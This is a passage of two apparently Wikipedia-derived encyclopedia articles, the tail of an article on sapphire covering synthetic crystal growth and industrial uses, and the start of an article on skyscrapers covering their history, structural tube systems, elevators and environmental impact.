synthetic ruby crystals. In the flame-fusion (Verneuil process), fine alumina powder is added to an oxyhydrogen flame, and this is directed downward against a ceramic pedestal. Following the successful synthesis of ruby, Verneuil focused his efforts on sapphire. Synthesis of blue sapphire came in 1909, after chemical analyses of sapphire suggested to Verneuil that iron and titanium were the cause of the blue color. Verneuil patented the process of producing synthetic blue sapphire in 1911. The key to the process is that the alumina powder does not melt as it falls through the flame. Instead it forms a sinter cone on the pedestal. When the tip of that cone reaches the hottest part of the flame, the tip melts. Thus the crystal growth is started from a tiny point, ensuring minimal strain. Next, more oxygen is added to the flame, causing it to burn slightly hotter. This expands the growing crystal laterally. At the same time, the pedestal is lowered at the same rate that the crystal grows vertically. The alumina in the flame is slowly deposited, creating a teardrop shaped "boule" of sapphire material. This step is continued until the desired size is reached, the flame is shut off and the crystal cools. The now elongated crystal contains a lot of strain due to the high thermal gradient between the flame and surrounding air. To release this strain, the now finger-shaped crystal will be tapped with a chisel to split it into two halves. Due to the vertical layered growth of the crystal and the curved upper growth surface (which starts from a drop), the crystals will display curved growth lines following the top surface of the boule. This is in contrast to natural corundum crystals, which feature angular growth lines expanding from a single point and following the planar crystal faces. Dopants Chemical dopants can be added to create artificial versions of the ruby, and all the other natural colors of sapphire, and in addition, other colors never seen in geological samples. Artificial sapphire material is identical to natural sapphire, except it can be made without the flaws that are found in natural stones. The disadvantage of the Verneuil process is that the grown crystals have high internal strains. Many methods of manufacturing sapphire today are variations of the Czochralski process, which was invented in 1916 by Polish chemist Jan Czochralski. In this process, a tiny sapphire seed crystal is dipped into a crucible made of the precious metal iridium or molybdenum, containing molten alumina, and then slowly withdrawn upward at a rate of 1 to 100 mm per hour. The alumina crystallizes on the end, creating long carrot-shaped boules of large size up to 200 kg in mass. Other growth methods Synthetic sapphire is also produced industrially from agglomerated aluminum oxide, sintered and fused (such as by hot isostatic pressing) in an inert atmosphere, yielding a transparent but slightly porous polycrystalline product. In 2003, the world's production of synthetic sapphire was 250 tons (1.25 × 109 carats), mostly by the United States and Russia. The availability of cheap synthetic sapphire unlocked many industrial uses for this unique material. Applications Equipment windows Synthetic sapphire—also referred to as sapphire glass—is commonly used for small windows, because it is both highly transparent to wavelengths of light between 150 nm (UV) and 5500 nm (IR) (the visible spectrum extends about 380 nm to 750 nm), and extraordinarily scratch-resistant. The key benefits of sapphire windows are: Very wide optical transmission band from UV to near infrared (0.15–5.5 μm) Significantly stronger than other optical materials or standard glass windows Highly resistant to scratching and abrasion (9 on the Mohs scale of mineral hardness scale, the third-hardest natural substance next to moissanite and diamonds) Extremely high melting temperature (2030 °C) Some sapphire-glass windows are made from pure sapphire boules that have been grown in a specific crystal orientation, typically along the optical axis, the c axis, for minimum birefringence for the application. The boules are sliced up into the desired window thickness and finally polished to the desired surface finish. Sapphire optical windows can be polished to a wide range of surface finishes due to its crystal structure and its hardness. The surface finishes of optical windows are normally called out by the scratch-dig specifications in accordance with the globally adopted MIL-O-13830 specification. Sapphire windows are used in both high-pressure and vacuum chambers for spectroscopy, crystals for watches, and windows in grocery-store barcode scanners, since the material's exceptional hardness and toughness makes it very resistant to scratching. In 2014 Apple consumed "one-fourth of the world's supply of sapphire to cover the iPhone's camera lens and fingerprint reader". Several attempts have been made to make sapphire screens for smartphones viable. Apple contracted GT Advanced Technologies, Inc. to manufacture sapphire screens for iPhones, but the venture failed, causing the bankruptcy of GTAT. The Kyocera Brigadier was the first production smartphone with a sapphire screen. Sapphire is used for end windows on some high-powered laser tubes, as its wide-band transparency and thermal conductivity allow it to handle very high power densities in the infrared and UV spectrum without degrading due to heating. One type of xenon arc lamporiginally called the "Cermax" and now known generically as the "ceramic-body xenon lamp"uses sapphire crystal output windows that tolerate higher thermal loads and consequently can provide higher output powers than conventional Xe lamps with pure silica windows. Sapphire window was used for the F-35 Lightning 2 Electro Optical Targeting System window, due to its high strength. Along with zirconia and aluminum oxynitride, synthetic sapphire is used for shatter-resistant windows in armored vehicles and various military body armor suits, in association with composites. As substrate for semiconducting circuits Thin sapphire wafers were the first successful use of an insulating substrate upon which to deposit silicon to make the integrated circuits known as silicon on sapphire or "SOS"; now other substrates can also be used for the class of circuits known more generally as silicon on insulator. Besides its excellent electrical insulating properties, sapphire has high thermal conductivity. CMOS chips on sapphire are especially useful for high-power radio-frequency (RF) applications such as those found in cellular telephones, public-safety band radios, and satellite communication systems. "SOS" also allows for the monolithic integration of both digital and analog circuitry all on one IC chip, and the construction of extremely low power circuits. In one process, after single crystal sapphire boules are grown, they are core-drilled into cylindrical rods, and wafers are then sliced from these cores. Wafers of single-crystal sapphire are also used in the semiconductor industry as substrates for the growth of devices based on gallium nitride (GaN). The use of sapphire significantly reduces the cost, because it has about one-seventh the cost of germanium. Gallium nitride on sapphire is commonly used in blue light-emitting diodes (LEDs). In lasers The first laser was made in 1960 by Theodore Maiman with a rod of synthetic ruby. Titanium-sapphire lasers are popular due to their relatively rare capacity to be tuned to various wavelengths in the red and near-infrared region of the electromagnetic spectrum. They can also be easily mode-locked. In these lasers a synthetically produced sapphire crystal with chromium or titanium impurities is irradiated with intense light from a special lamp, or another laser, to create stimulated emission. In endoprostheses Monocrystalline sapphire is fairly biocompatible and the exceptionally low wear of sapphire–metal pairs has led to the introduction (in Ukraine) of sapphire monocrystals for hip joint endoprostheses. Historical and cultural references Etymologically, the English word "sapphire" derives from French , from Latin , sappirus from Greek σαπφειρος (sappheiros) from Hebrew (), a term that probably originally referred to lapis lazuli, as sapphires were only discovered in Roman times. The term is believed to derive from the root סָפַר (sāp̄ar), meaning "to score with a mark," presumably because gemstones can be used to scratch stone surfaces due to their high hardness. A traditional Hindu belief holds that the sapphire causes the planet Saturn (Shani) to be favorable to the wearer. The Greek term for sapphire quite likely was instead used to refer to lapis lazuli. During the Medieval Ages, European lapidaries came to refer to blue corundum crystal by "sapphire", a derivative of the Latin word for blue: . The sapphire is the traditional gift for a 45th wedding anniversary. A sapphire jubilee occurs after 65 years. In 2017 Queen Elizabeth II marked the sapphire jubilee of her accession to the throne. The sapphire is the birthstone of September. An Italian superstition holds that sapphires are amulets against eye problems, and melancholy. Mary, Queen of Scots, owned a medicinal sapphire worn as a pendant to rub sore eyes. Pope Innocent III decreed that rings of bishops should be made of pure gold, set with an unengraved sapphire, as possessing the virtues and qualities essential to its dignified position as a seal of secrets, for there be many things "that a priest conceals from the senses of the vulgar and less intelligent; which he keeps locked up as it were under seal." The sapphire is the official state gem of Queensland since August 1985. Notable sapphires Extensive tables listing over a hundred important and famous rubies and sapphires can be found in Chapter 10 of Ruby & Sapphire: A Gemologist's Guide.
Physical sciences
Mineral gemstones
null
29485
https://en.wikipedia.org/wiki/Skyscraper
Skyscraper
A skyscraper is a tall continuously habitable building having multiple floors. Modern sources define skyscrapers as being at least or in height, though there is no universally accepted definition, other than being very tall high-rise buildings. Skyscrapers may host offices, hotels, residential spaces, and retail spaces. One common feature of skyscrapers is having a steel frame that supports curtain walls. These curtain walls either bear on the framework below or are suspended from the framework above, rather than resting on load-bearing walls of conventional construction. Some early skyscrapers have a steel frame that enables the construction of load-bearing walls taller than of those made of reinforced concrete. Modern skyscraper walls are not load-bearing, and most skyscrapers are characterized by large surface areas of windows made possible by steel frames and curtain walls. However, skyscrapers can have curtain walls that mimic conventional walls with a small surface area of windows. Modern skyscrapers often have a tubular structure, and are designed to act like a hollow cylinder to resist wind, seismic, and other lateral loads. To appear more slender, allow less wind exposure and transmit more daylight to the ground, many skyscrapers have a design with setbacks, which in some cases is also structurally required. , fifteen cities in the world have more than 100 skyscrapers that are or taller: Hong Kong with 552 skyscrapers; Shenzhen, China with 373 skyscrapers; New York City, US with 314 skyscrapers; Dubai, UAE with 252 skyscrapers; Guangzhou, China with 188 skyscrapers; Shanghai, China with 183 skyscrapers; Tokyo, Japan with 168 skyscrapers; Kuala Lumpur, Malaysia with 156 skyscrapers; Wuhan, China with 149 skyscrapers; Chongqing, China, with 144 skyscrapers; Chicago, US, with 137 skyscrapers; Chengdu, China with 117 skyscrapers; Jakarta, Indonesia, with 112 skyscrapers; Bangkok, Thailand, with 111 skyscrapers, and Mumbai, India with 102. As of 2024, there are over 7 thousand skyscrapers over 150 m (492 ft) in height worldwide. Definition The term "skyscraper" was first applied to buildings of steel-framed construction of at least 10 stories in the late 19th century, a result of public amazement at the tall buildings being built in major American cities like New York City, Philadelphia, Boston, Chicago, Detroit, and St. Louis. The first steel-frame skyscraper was the Home Insurance Building, originally 10 stories with a height of , in Chicago in 1885; two additional stories were added. Some point to Philadelphia's 10-story Jayne Building (1849–50) as a proto-skyscraper, or to New York's seven-floor Equitable Life Building, built in 1870. Steel skeleton construction has allowed for today's supertall skyscrapers now being built worldwide. The nomination of one structure versus another being the first skyscraper, and why, depends on what factors are stressed. The structural definition of the word skyscraper was refined later by architectural historians, based on engineering developments of the 1880s that had enabled construction of tall multi-story buildings. This definition was based on the steel skeleton—as opposed to constructions of load-bearing masonry, which passed their practical limit in 1891 with Chicago's Monadnock Building. — Louis Sullivan's The Tall Office Building Artistically Considered (1896) Some structural engineers define a high-rise as any vertical construction for which wind is a more significant load factor than earthquake or weight. Note that this criterion fits not only high-rises but some other tall structures, such as towers. Different organizations from the United States and Europe define skyscrapers as buildings at least in height or taller, with "supertall" skyscrapers for buildings higher than and "megatall" skyscrapers for those taller than . The tallest structure in ancient times was the Great Pyramid of Giza in ancient Egypt, built in the 26th century BC. It was not surpassed in height for thousands of years, the Lincoln Cathedral having exceeded it in 1311–1549, before its central spire collapsed. The latter in turn was not surpassed until the Washington Monument in 1884. However, being uninhabited, none of these structures actually comply with the modern definition of a skyscraper. High-rise apartments flourished in classical antiquity. Ancient Roman insulae in imperial cities reached 10 and more stories. Beginning with Augustus (r. 30 BC-14 AD), several emperors attempted to establish limits of for multi-stories buildings, but were met with only limited success. Lower floors were typically occupied by shops or wealthy families, with the upper rented to the lower classes. Surviving Oxyrhynchus Papyri indicate that seven-stories buildings existed in provincial towns such as in 3rd century AD Hermopolis in Roman Egypt. The skylines of many important medieval cities had large numbers of high-rise urban towers, built by the wealthy for defense and status. The residential Towers of 12th century Bologna numbered between 80 and 100 at a time, the tallest of which is the high Asinelli Tower. A Florentine law of 1251 decreed that all urban buildings be immediately reduced to less than . Even medium-sized towns of the era are known to have proliferations of towers, such as the 72 towers that ranged up to height in San Gimignano. The medieval Egyptian city of Fustat housed many high-rise residential buildings, which Al-Muqaddasi in the 10th century described as resembling minarets. Nasir Khusraw in the early 11th century described some of them rising up to 14 stories, with roof gardens on the top floor complete with ox-drawn water wheels for irrigating them. Cairo in the 16th century had high-rise apartment buildings where the two lower floors were for commercial and storage purposes and the multiple stories above them were rented out to tenants. An early example of a city consisting entirely of high-rise housing is the 16th-century city of Shibam in Yemen. Shibam was made up of over 500 tower houses, each one rising 5 to 11 stories high, with each floor being an apartment occupied by a single family. The city was built in this way in order to protect it from Bedouin attacks. Shibam still has the tallest mudbrick buildings in the world, with many of them over high. An early modern example of high-rise housing was in 17th-century Edinburgh, Scotland, where a defensive city wall defined the boundaries of the city. Due to the restricted land area available for development, the houses increased in height instead. Buildings of 11 stories were common, and there are records of buildings as high as 14 stories. Many of the stone-built structures can still be seen today in the old town of Edinburgh. The oldest iron framed building in the world, although only partially iron framed, is The Flaxmill in Shrewsbury, England. Built in 1797, it is seen as the "grandfather of skyscrapers", since its fireproof combination of cast iron columns and cast iron beams developed into the modern steel frame that made modern skyscrapers possible. In 2013 funding was confirmed to convert the derelict building into offices. Early skyscrapers In 1857, Elisha Otis introduced the safety elevator at the E. V. Haughwout Building in New York City, allowing convenient and safe transport to buildings' upper floors. Otis later introduced the first commercial passenger elevators to the Equitable Life Building in 1870, considered by some architectural historians to be the first skyscraper. Another crucial development was the use of a steel frame instead of stone or brick, otherwise the walls on the lower floors on a tall building would be too thick to be practical. An early development in this area was Oriel Chambers in Liverpool, England, built in 1864. It was only five floors high. The Royal Academy of Arts states, "critics at the time were horrified by its 'large agglomerations of protruding plate glass bubbles'. In fact, it was a precursor to Modernist architecture, being the first building in the world to feature a metal-framed glass curtain wall, a design element which creates light, airy interiors and has since been used the world over as a defining feature of skyscrapers". Further developments led to what many individuals and organizations consider the world's first skyscraper, the ten-story Home Insurance Building in Chicago, built in 1884–1885. While its original height of 42.1 m (138 ft) does not even qualify as a skyscraper today, it was record setting. The building of tall buildings in the 1880s gave the skyscraper its first architectural movement, broadly termed the Chicago School, which developed what has been called the Commercial Style. The architect, Major William Le Baron Jenney, created a load-bearing structural frame. In this building, a steel frame supported the entire weight of the walls, instead of load-bearing walls carrying the weight of the building. This development led to the "Chicago skeleton" form of construction. In addition to the steel frame, the Home Insurance Building also utilized fireproofing, elevators, and electrical wiring, key elements in most skyscrapers today. Burnham and Root's Rand McNally Building in Chicago, 1889, was the first all-steel framed skyscraper, while Louis Sullivan's Wainwright Building in St. Louis, Missouri, 1891, was the first steel-framed building with soaring vertical bands to emphasize the height of the building and is therefore considered to be the first early skyscraper. In 1889, the Mole Antonelliana in Italy was 197 m (549 ft) tall. Most early skyscrapers emerged in the land-strapped areas of New York City and Chicago toward the end of the 19th century. A land boom in Melbourne, Australia between 1888 and 1891 spurred the creation of a significant number of early skyscrapers, though none of these were steel reinforced and few remain today. Height limits and fire restrictions were later introduced. In the late 1800s, London builders found building heights limited due to issues with existing buildings. High-rise development in London is restricted at certain sites if it would obstruct protected views of St Paul's Cathedral and other historic buildings. This policy, 'St Paul's Heights', has officially been in operation since 1927. Concerns about aesthetics and fire safety had likewise hampered the development of skyscrapers across continental Europe for the first half of the 20th century. By 1940, there were around 100 high-rise buildings in Europe (List of early skyscrapers). Some examples of these are the tall 1898 Witte Huis (White House) in Rotterdam; the tall PAST Building (1906–1908) in Warsaw; the Royal Liver Building in Liverpool, completed in 1911 and high; the tall 1924 Marx House in Düsseldorf, the tall Borsigturm in Berlin, built in 1924, the tall Hansahochhaus in Cologne, Germany, built in 1925; the Kungstornen (Kings' Towers) in Stockholm, Sweden, which were built 1924–25; the Ullsteinhaus in Berlin, Germany, built in 1927; the Edificio Telefónica in Madrid, Spain, built in 1929; the Boerentoren in Antwerp, Belgium, built in 1932; the Prudential Building in Warsaw, Poland, built in 1934; and the Torre Piacentini in Genoa, Italy, built in 1940. After an early competition between New York City and Chicago for the world's tallest building, New York took the lead by 1895 with the completion of the tall American Surety Building, leaving New York with the title of the world's tallest building for many years. Modern skyscrapers Modern skyscrapers are built with steel or reinforced concrete frameworks and curtain walls of glass or polished stone. They use mechanical equipment such as water pumps and elevators. Since the 1960s, according to the CTBUH, the skyscraper has been reoriented away from a symbol for North American corporate power to instead communicate a city or nation's place in the world. Skyscraper construction entered a three-decades-long era of stagnation in 1930 due to the Great Depression and then World War II. Shortly after the war ended, Russia began construction on a series of skyscrapers in Moscow. Seven, dubbed the "Seven Sisters", were built between 1947 and 1953; and one, the Main building of Moscow State University, was the tallest building in Europe for nearly four decades (1953–1990). Other skyscrapers in the style of Socialist Classicism were erected in East Germany (Frankfurter Tor), Poland (PKiN), Ukraine (Hotel Moscow), Latvia (Academy of Sciences), and other Eastern Bloc countries. Western European countries also began to permit taller skyscrapers during the years immediately following World War II. Early examples include Edificio España (Spain) and Torre Breda (Italy). From the 1930s onward, skyscrapers began to appear in various cities in East and Southeast Asia as well as in Latin America. Finally, they also began to be constructed in cities in Africa, the Middle East, South Asia, and Oceania from the late 1950s. Skyscraper projects after World War II typically rejected the classical designs of the early skyscrapers, instead embracing the uniform international style; many older skyscrapers were redesigned to suit contemporary tastes or even demolished—such as New York's Singer Building, once the world's tallest skyscraper. German-American architect Ludwig Mies van der Rohe became one of the world's most renowned architects in the second half of the 20th century. He conceived the glass façade skyscraper and, along with Norwegian Fred Severud, designed the Seagram Building in 1958, a skyscraper that is often regarded as the pinnacle of modernist high-rise architecture. Skyscraper construction surged throughout the 1960s. The impetus behind the upswing was a series of transformative innovations which made it possible for people to live and work in "cities in the sky". In the early 1960s Bangladeshi-American structural engineer Fazlur Rahman Khan, considered the "father of tubular designs" for high-rises, discovered that the dominating rigid steel frame structure was not the only system apt for tall buildings, marking a new era of skyscraper construction in terms of multiple structural systems. His central innovation in skyscraper design and construction was the concept of the "tube" structural system, including the "framed tube", "trussed tube", and "bundled tube". His "tube concept", using all the exterior wall perimeter structure of a building to simulate a thin-walled tube, revolutionized tall building design. These systems allow greater economic efficiency, and also allow skyscrapers to take on various shapes, no longer needing to be rectangular and box-shaped. The first building to employ the tube structure was the Chestnut De-Witt apartment building, considered to be a major development in modern architecture. These new designs opened an economic door for contractors, engineers, architects, and investors, providing vast amounts of real estate space on minimal plots of land. Over the next fifteen years, many towers were built by Fazlur Rahman Khan and the "Second Chicago School", including the hundred-story John Hancock Center and the massive Willis Tower. Other pioneers of this field include Hal Iyengar, William LeMessurier, and Minoru Yamasaki, the architect of the World Trade Center. Many buildings designed in the 70s lacked a particular style and recalled ornamentation from earlier buildings designed before the 50s. These design plans ignored the environment and loaded structures with decorative elements and extravagant finishes. This approach to design was opposed by Fazlur Khan and he considered the designs to be whimsical rather than rational. Moreover, he considered the work to be a waste of precious natural resources. Khan's work promoted structures integrated with architecture and the least use of material resulting in the smallest impact on the environment. The next era of skyscrapers will focus on the environment including performance of structures, types of material, construction practices, absolute minimal use of materials/natural resources, embodied energy within the structures, and more importantly, a holistically integrated building systems approach. Modern building practices regarding supertall structures have led to the study of "vanity height". Vanity height, according to the CTBUH, is the distance between the highest floor and its architectural top (excluding antennae, flagpole or other functional extensions). Vanity height first appeared in New York City skyscrapers as early as the 1920s and 1930s but supertall buildings have relied on such uninhabitable extensions for on average 30% of their height, raising potential definitional and sustainability issues. The current era of skyscrapers focuses on sustainability, its built and natural environments, including the performance of structures, types of materials, construction practices, absolute minimal use of materials and natural resources, energy within the structure, and a holistically integrated building systems approach. LEED is a current green building standard. Architecturally, with the movements of Postmodernism, New Urbanism and New Classical Architecture, that established since the 1980s, a more classical approach came back to global skyscraper design, that remains popular today. Examples are the Wells Fargo Center, NBC Tower, Parkview Square, 30 Park Place, the Messeturm, the iconic Petronas Towers and Jin Mao Tower. Other contemporary styles and movements in skyscraper design include organic, sustainable, neo-futurist, structuralist, high-tech, deconstructivist, blob, digital, streamline, novelty, critical regionalist, vernacular, Neo Art Deco and neohistorist, also known as revivalist. 3 September is the global commemorative day for skyscrapers, called "Skyscraper Day". New York City developers competed among themselves, with successively taller buildings claiming the title of "world's tallest" in the 1920s and early 1930s, culminating with the completion of the Chrysler Building in 1930 and the Empire State Building in 1931, the world's tallest building for forty years. The first completed tall World Trade Center tower became the world's tallest building in 1972. However, it was overtaken by the Sears Tower (now Willis Tower) in Chicago within two years. The tall Sears Tower stood as the world's tallest building for 24 years, from 1974 until 1998, until it was edged out by Petronas Twin Towers in Kuala Lumpur, which held the title for six years. Design and construction The design and construction of skyscrapers involves creating safe, habitable spaces in very tall buildings. The buildings must support their weight, resist wind and earthquakes, and protect occupants from fire. Yet they must also be conveniently accessible, even on the upper floors, and provide utilities and a comfortable climate for the occupants. The problems posed in skyscraper design are considered among the most complex encountered given the balances required between economics, engineering, and construction management. One common feature of skyscrapers is a steel framework from which curtain walls are suspended, rather than load-bearing walls of conventional construction. Most skyscrapers have a steel frame that enables them to be built taller than typical load-bearing walls of reinforced concrete. Skyscrapers usually have a particularly small surface area of what are conventionally thought of as walls. Because the walls are not load-bearing most skyscrapers are characterized by surface areas of windows made possible by the concept of steel frame and curtain wall. However, skyscrapers can also have curtain walls that mimic conventional walls and have a small surface area of windows. The concept of a skyscraper is a product of the industrialized age, made possible by cheap fossil fuel derived energy and industrially refined raw materials such as steel and concrete. The construction of skyscrapers was enabled by steel frame construction that surpassed brick and mortar construction starting at the end of the 19th century and finally surpassing it in the 20th century together with reinforced concrete construction as the price of steel decreased and labor costs increased. The steel frames become inefficient and uneconomic for supertall buildings as usable floor space is reduced for progressively larger supporting columns. Since about 1960, tubular designs have been used for high rises. This reduces the usage of material (more efficient in economic terms – Willis Tower uses a third less steel than the Empire State Building) yet allows greater height. It allows fewer interior columns, and so creates more usable floor space. It further enables buildings to take on various shapes. Elevators are characteristic to skyscrapers. In 1852 Elisha Otis introduced the safety elevator, allowing convenient and safe passenger movement to upper floors. Another crucial development was the use of a steel frame instead of stone or brick, otherwise the walls on the lower floors on a tall building would be too thick to be practical. Today major manufacturers of elevators include Otis, ThyssenKrupp, Schindler, and KONE. Advances in construction techniques have allowed skyscrapers to narrow in width, while increasing in height. Some of these new techniques include mass dampers to reduce vibrations and swaying, and gaps to allow air to pass through, reducing wind shear. Basic design considerations Good structural design is important in most building design, but particularly for skyscrapers since even a small chance of catastrophic failure is unacceptable given the tremendous damage such failure would cause. This presents a paradox to civil engineers: the only way to assure a lack of failure is to test for all modes of failure, in both the laboratory and the real world. But the only way to know of all modes of failure is to learn from previous failures. Thus, no engineer can be absolutely sure that a given structure will resist all loadings that could cause failure; instead, one can only have large enough margins of safety such that a failure is acceptably unlikely. When buildings do fail, engineers question whether the failure was due to some lack of foresight or due to some unknowable factor. Loading and vibration The load a skyscraper experiences is largely from the force of the building material itself. In most building designs, the weight of the structure is much larger than the weight of the material that it will support beyond its own weight. In technical terms, the dead load, the load of the structure, is larger than the live load, the weight of things in the structure (people, furniture, vehicles, etc.). As such, the amount of structural material required within the lower levels of a skyscraper will be much larger than the material required within higher levels. This is not always visually apparent. The Empire State Building's setbacks are actually a result of the building code at the time (1916 Zoning Resolution), and were not structurally required. On the other hand, John Hancock Center's shape is uniquely the result of how it supports loads. Vertical supports can come in several types, among which the most common for skyscrapers can be categorized as steel frames, concrete cores, tube within tube design, and shear walls. The wind loading on a skyscraper is also considerable. In fact, the lateral wind load imposed on supertall structures is generally the governing factor in the structural design. Wind pressure increases with height, so for very tall buildings, the loads associated with wind are larger than dead or live loads. Other vertical and horizontal loading factors come from varied, unpredictable sources, such as earthquakes. Steel frame By 1895, steel had replaced cast iron as skyscrapers' structural material. Its malleability allowed it to be formed into a variety of shapes, and it could be riveted, ensuring strong connections. The simplicity of a steel frame eliminated the inefficient part of a shear wall, the central portion, and consolidated support members in a much stronger fashion by allowing both horizontal and vertical supports throughout. Among steel's drawbacks is that as more material must be supported as height increases, the distance between supporting members must decrease, which in turn increases the amount of material that must be supported. This becomes inefficient and uneconomic for buildings above 40 stories tall as usable floor spaces are reduced for supporting column and due to more usage of steel. Tube structural systems A new structural system of framed tubes was developed by Fazlur Rahman Khan in 1963. The framed tube structure is defined as "a three dimensional space structure composed of three, four, or possibly more frames, braced frames, or shear walls, joined at or near their edges to form a vertical tube-like structural system capable of resisting lateral forces in any direction by cantilevering from the foundation". Closely spaced interconnected exterior columns form the tube. Horizontal loads (primarily wind) are supported by the structure as a whole. Framed tubes allow fewer interior columns, and so create more usable floor space, and about half the exterior surface is available for windows. Where larger openings like garage doors are required, the tube frame must be interrupted, with transfer girders used to maintain structural integrity. Tube structures cut down costs, at the same time allowing buildings to reach greater heights. Concrete tube-frame construction was first used in the DeWitt-Chestnut Apartment Building, completed in Chicago in 1963, and soon after in the John Hancock Center and World Trade Center. The tubular systems are fundamental to tall building design. Most buildings over 40 stories constructed since the 1960s now use a tube design derived from Khan's structural engineering principles, examples including the construction of the World Trade Center, Aon Center, Petronas Towers, Jin Mao Building, and most other supertall skyscrapers since the 1960s. The strong influence of tube structure design is also evident in the construction of the current tallest skyscraper, the Burj Khalifa, which uses a Buttressed core. Trussed tube and X-bracing: Khan pioneered several other variations of the tube structure design. One of these was the concept of X-bracing, or the trussed tube, first employed for the John Hancock Center. This concept reduced the lateral load on the building by transferring the load into the exterior columns. This allows for a reduced need for interior columns thus creating more floor space. This concept can be seen in the John Hancock Center, designed in 1965 and completed in 1969. One of the most famous buildings of the structural expressionist style, the skyscraper's distinctive X-bracing exterior is actually a hint that the structure's skin is indeed part of its 'tubular system'. This idea is one of the architectural techniques the building used to climb to record heights (the tubular system is essentially the spine that helps the building stand upright during wind and earthquake loads). This X-bracing allows for both higher performance from tall structures and the ability to open up the inside floorplan (and usable floor space) if the architect desires. The John Hancock Center was far more efficient than earlier steel-frame structures. Where the Empire State Building (1931), required about 206 kilograms of steel per square metre and 28 Liberty Street (1961) required 275, the John Hancock Center required only 145. The trussed tube concept was applied to many later skyscrapers, including the Onterie Center, Citigroup Center and Bank of China Tower. Bundled tube: An important variation on the tube frame is the bundled tube, which uses several interconnected tube frames. The Willis Tower in Chicago used this design, employing nine tubes of varying height to achieve its distinct appearance. The bundled tube structure meant that "buildings no longer need be boxlike in appearance: they could become sculpture." Tube in tube: Tube-in-tube system takes advantage of core shear wall tubes in addition to exterior tubes. The inner tube and outer tube work together to resist gravity loads and lateral loads and to provide additional rigidity to the structure to prevent significant deflections at the top. This design was first used in One Shell Plaza. Later buildings to use this structural system include the Petronas Towers. Outrigger and belt truss: The outrigger and belt truss system is a lateral load resisting system in which the tube structure is connected to the central core wall with very stiff outriggers and belt trusses at one or more levels. BHP House was the first building to use this structural system followed by the First Wisconsin Center, since renamed U.S. Bank Center, in Milwaukee. The center rises 601 feet, with three belt trusses at the bottom, middle and top of the building. The exposed belt trusses serve aesthetic and structural purposes. Later buildings to use this include Shanghai World Financial Center. Concrete tube structures: The last major buildings engineered by Khan were the One Magnificent Mile and Onterie Center in Chicago, which employed his bundled tube and trussed tube system designs respectively. In contrast to his earlier buildings, which were mainly steel, his last two buildings were concrete. His earlier DeWitt-Chestnut Apartments building, built in 1963 in Chicago, was also a concrete building with a tube structure. Trump Tower in New York City is also another example that adapted this system. Shear wall frame interaction system: Khan developed the shear wall frame interaction system for mid high-rise buildings. This structural system uses combinations of shear walls and frames designed to resist lateral forces. The first building to use this structural system was the 35-stories Brunswick Building. The Brunswick building (today known as the "Cook County Administration Building") was completed in 1965 and became the tallest reinforced concrete structure of its time. The structural system of Brunswick Building consists of a concrete shear wall core surrounded by an outer concrete frame of columns and spandrels. Apartment buildings up to 70 stories high have successfully used this concept. The elevator conundrum The invention of the elevator was a precondition for the invention of skyscrapers, given that most people would not (or could not) climb more than a few flights of stairs at a time. The elevators in a skyscraper are not simply a necessary utility, like running water and electricity, but are in fact closely related to the design of the whole structure: a taller building requires more elevators to service the additional floors, but the elevator shafts consume valuable floor space. If the service core, which contains the elevator shafts, becomes too big, it can reduce the profitability of the building. Architects must therefore balance the value gained by adding height against the value lost to the expanding service core. Many tall buildings use elevators in a non-standard configuration to reduce their footprint. Buildings such as the former World Trade Center Towers and Chicago's John Hancock Center use sky lobbies, where express elevators take passengers to upper floors which serve as the base for local elevators. This allows architects and engineers to place elevator shafts on top of each other, saving space. Sky lobbies and express elevators take up a significant amount of space, however, and add to the amount of time spent commuting between floors. Other buildings, such as the Petronas Towers, use double-deck elevators, allowing more people to fit in a single elevator, and reaching two floors at every stop. It is possible to use even more than two levels on an elevator, although this has never been done. The main problem with double-deck elevators is that they cause everyone in the elevator to stop when only person on one level needs to get off at a given floor. Buildings with sky lobbies include the World Trade Center, Petronas Twin Towers, Willis Tower and Taipei 101. The 44th-floor sky lobby of the John Hancock Center also featured the first high-rise indoor swimming pool, which remains the highest in the United States. Economic rationale Skyscrapers are usually situated in city centres where the price of land is high. Constructing a skyscraper becomes justified if the price of land is so high that it makes economic sense to build upward as to minimize the cost of the land per the total floor area of a building. Thus the construction of skyscrapers is dictated by economics and results in skyscrapers in a certain part of a large city unless a building code restricts the height of buildings. Skyscrapers are rarely seen in small cities and they are characteristic of large cities, because of the critical importance of high land prices for the construction of skyscrapers. Usually only office, commercial and hotel users can afford the rents in the city center and thus most tenants of skyscrapers are of these classes. Today, skyscrapers are an increasingly common sight where land is expensive, as in the centres of big cities, because they provide such a high ratio of rentable floor space per unit area of land. Another disadvantage of very high skyscrapers is the loss of usable floorspace, as many elevator shafts are needed to enable performant vertical travelling. This led to the introduction of express lifts and sky lobbies where transfer to slower distribution lifts can be done. Environmental impact Constructing a single skyscraper requires large quantities of materials like steel, concrete, and glass, and these materials represent significant embodied energy. Skyscrapers are thus material and energy intensive buildings. Skyscrapers have considerable mass, requiring a stronger foundation than a shorter, lighter building. In construction, building materials must be lifted to the top of a skyscraper during construction, requiring more energy than would be necessary at lower heights. Furthermore, a skyscraper consumes much electricity because potable and non-potable water have to be pumped to the highest occupied floors, skyscrapers are usually designed to be mechanically ventilated, elevators are generally used instead of stairs, and electric lights are needed in rooms far from the windows and windowless spaces such as elevators, bathrooms and stairwells. Skyscrapers can be artificially lit and the energy requirements can be covered by renewable energy or other electricity generation with low greenhouse gas emissions. Heating and cooling of skyscrapers can be efficient, because of centralized HVAC systems, heat radiation blocking windows and small surface area of the building. There is Leadership in Energy and Environmental Design (LEED) certification for skyscrapers. For example, the Empire State Building received a gold Leadership in Energy and Environmental Design rating in September 2011 and the Empire State Building is the tallest LEED certified building in the United States, proving that skyscrapers can be environmentally friendly. The Gherkin in London, the United Kingdom is another example of an environmentally friendly skyscraper. In the lower levels of a skyscraper a larger percentage of the building floor area must be devoted to the building structure and services than is required for lower buildings: More structure – because it must be stronger to support more floors above The elevator conundrum creates the need for more lift shafts—everyone comes in at the bottom and they all have to pass through the lower part of the building to get to the upper levels. Building services – power and water enter the building from below and have to pass through the lower levels to get to the upper levels. In low-rise structures, the support rooms (chillers, transformers, boilers, pumps and air handling units) can be put in basements or roof space—areas which have low rental value. There is, however, a limit to how far this plant can be located from the area it serves. The farther away it is the larger the risers for ducts and pipes from this plant to the floors they serve and the more floor area these risers take. In practice this means that in highrise buildings this plant is located on 'plant levels' at intervals up the building. Operational energy The building sector accounts for approximately 50% of greenhouse gas emissions, with operational energy accounting for 80-90% of building related energy use. Operational energy use is affected by the magnitude of conduction between the interior and exterior, convection from infiltrating air, and radiation through glazing. The extent to which these factors affect the operational energy vary depending on the microclimate of the skyscraper, with increased wind speeds 